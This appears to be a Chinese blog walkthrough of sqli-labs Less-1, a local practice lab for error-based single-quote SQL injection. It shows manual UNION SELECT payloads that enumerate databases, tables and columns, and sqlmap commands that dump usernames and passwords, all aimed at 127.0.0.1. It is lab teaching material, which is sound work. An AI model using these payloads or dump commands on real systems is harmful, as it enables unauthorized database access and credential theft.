sqli-labs less1 基于错误的GET单引号字符型注入(手工+sqlmap)

最新推荐文章于 2023-03-31 11:54:20 发布
最新推荐文章于 2023-03-31 11:54:20 发布
阅读量681 收藏 5
点赞数 2
分类专栏: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44023403/article/details/115338958
版权

sqli-labs less1 基于错误的GET单引号字符型注入

前言

Sqli-labs 是一个开源且全面的 SQL 注入练习靶场,里面包含很多种类型的SQL注入,很适合新手来练习。

基于错误的GET单引号字符型注入

根据题目提示,输入http://127.0.0.1/sqli-labs/Less-1/?id=1显示正常。
在这里插入图片描述

1.手工注入

1.判断是数字型还是字符型,添加单引号(是%27,被浏览器转译了),返回报错;
在这里插入图片描述

在单引号后添加 --+注释掉后面内容,返回正常;说明这个地方是单引号字符型注入。
在这里插入图片描述

注:我的数据库是mysql,mysql中的注释常用方式–+

2.使用order by 语句判断,该表中一共有几列数据,order by 语句order by column1 [ASC|DESC], column2 [ASC|DESC],… 此处以数字1,2,3…指定以某一列为key进行排序;

order by 3时;http://127.0.0.1/sqli-labs/Less-1/?id=1’ order by 3–+,返回成功;
在这里插入图片描述

order by 4时;http://127.0.0.1/sqli-labs/Less-1/?id=1’ order by 4–+,返回失败,证明数据库有3列;

在这里插入图片描述

这里查看后台数据库来验证一下,确实是3列数据。

在这里插入图片描述

3.接着进行联合注入,通过回显爆出表名,列名,字段,用户名和密码。
4.爆数据库名,http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata%20–+

注:这里我们需要把第一句设为假,才能执行之后的语句,如id=-1,这样就可以回显后两列回显你构造的语句了

在这里插入图片描述

5.爆security内的所有表名,http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)–+
在这里插入图片描述

6.爆所有列名,http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27%20–+

在这里插入图片描述

2.sqlmap注入

判断id=1处是否存在注入点,python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1
在这里插入图片描述

列举数据库名称 -dbs
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -dbs
在这里插入图片描述

枚举数据库表
–tables枚举表名–>指定具体数据库 -D数据库名
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D security -tables
在这里插入图片描述

Sqlmap枚举数据表列
–columns-D指定数据库-T指定数据表-C指定具体字段
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D security -T users --columns
在这里插入图片描述

Sqlmap枚举数据值
-dump
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D security -T users -C username,password --dump(想多项查询用,隔开)
在这里插入图片描述

看我的眼色行事
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入--基于错误的GET单引号字符注入
Leslieyzz的博客
02-14 476
SQL注入--基于错误的GET单引号字符注入
phpstudy+靶场sqli-labs-master下载
11-08
5. **SQL注入原理**:理解SQL注入的形成原因,如不安全的SQL拼接、未过滤用户输入等,并了解不同类SQL注入攻击,如基于错误注入、基于时间的盲注等。 6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个...
sql注入闯关笔记【Less-1】基于错误的GET单引号字符注入
GGGu123的博客
05-18 669
sql注入第一关,万事开好头!
对于sqli-labs里面总是出现‘,单引号被转义的情况
weixin_62281892的博客
06-29 114
单引号被转义
【网安学习--SQL注入】详解成功搭建sqlilab靶场后第一关出现单引号被转义问题
qq_34831688的博客
08-20 1161
初学网络安全,搭建sql注入练习靶场,遇到的问题及解决办法
使用PhpStudy进行sqli-labs注入实验时,出现特殊符号被分斜杠“\”转义,导致注入失败
Xiaoxiaoqiang_的博客
02-08 636
在进行sqli-labs注入时,特殊字符被转义的情况主要是PHP study工具中的设置问题。 打开phpstudy工具所在的文件夹,需要更改其文件夹下的“PHP”文件夹中的php.ini配置文件。 将配置文件中的“magic_quotes_gpc = On”改为“magic_quotes_gpc=Off”。如下图所示。 重启phpstudy服务。 ...
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2797
sqli-labs靶场之前建议补一下基础。
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 416
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
jeakinscheung-sqli-labs-php7-master.zip
03-16
3. **转义特殊字符**:使用函数如`mysqli_real_escape_string`来转义可能引起SQL语句解析错误字符。 4. **使用存储过程**:虽然不是绝对安全,但存储过程可以在一定程度上限制恶意输入的影响。 5. **最小权限...
手工)【sqli-labs5-6】GET方法、单双引号、报错注入:基本步骤、错误注入过程
05-28 923
【报错注入+闭合】
手工)【sqli-labs靶场1-4】GET请求、错误注入单引号、双引号、括号闭合、字符、整
05-26 1233
sqllabs靶场1-4】无省略+手工
sqli-labs 1~4关详解
qq_45756971的博客
10-15 488
点进去题目:提示我们输入题目id,第一题,所以我们输入?id=1,回车即可。如图:首先可以判断这里接受的是一个GET请求,先在1后面加一个’ 发现报错,说明这里没有过滤掉引号,所以这里是一个注入SQL注入通常有两种类,整形注入字符注入,那么我们要判断这是哪种注入就要分析这里的报错语句,报错信息中共有5个单引号,"实际上是两个单引号,最外面的两个是报错信息的提示引号,'1’两边的引号是后台代码的引号,多出来的就是我们加上的,因为这里给输入的1加上了引号所以后台接受的是字符,那么我们在后续的注入中需
sqli-labs-master第一关:基于错误的GET单引号字符注入
weixin_34402408的博客
11-12 419
首先来到第一关: http://127.0.0.1/sqli-labs-master/Less-1/ 用语句http://127.0.0.1/sqli-labs-master/Less-1/?id=1'进行测试报错 可以看到sql语句出错了。 用 and 1 = 1去测试: http://127.0.0.1/sqli-labs-maste...
sqli-labs通关-------11lesson-post(基于错误的POST单引号字符注入)
枯藤闲画云
07-05 429
Post 基于表单提交,类似于下图 Sql的注释:--【空格】单行注释 在url中用--+ # 单行注释 /**/ 多行注释 Post注入 个人觉得就是想法设法搞到密码登录或者想办法绕过密码 方法一: 我们先随便输入一个账号密码给账号加上反斜杠看看啥情况,发现有报错,so根据报错字段应该是被单引号隐起来的。...
sqli-Less1
qq_44060093的博客
04-19 503
最近准备拾起sql注入sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通 正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。 我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的 首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句 首先发现id=1,可以查数据 再输入一个’ 可能有注入 构造?id=1’ and...
数据分析的核心技能和方法
最新发布
07-19
数据分析的核心技能和方法
sqli-labs-less1
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值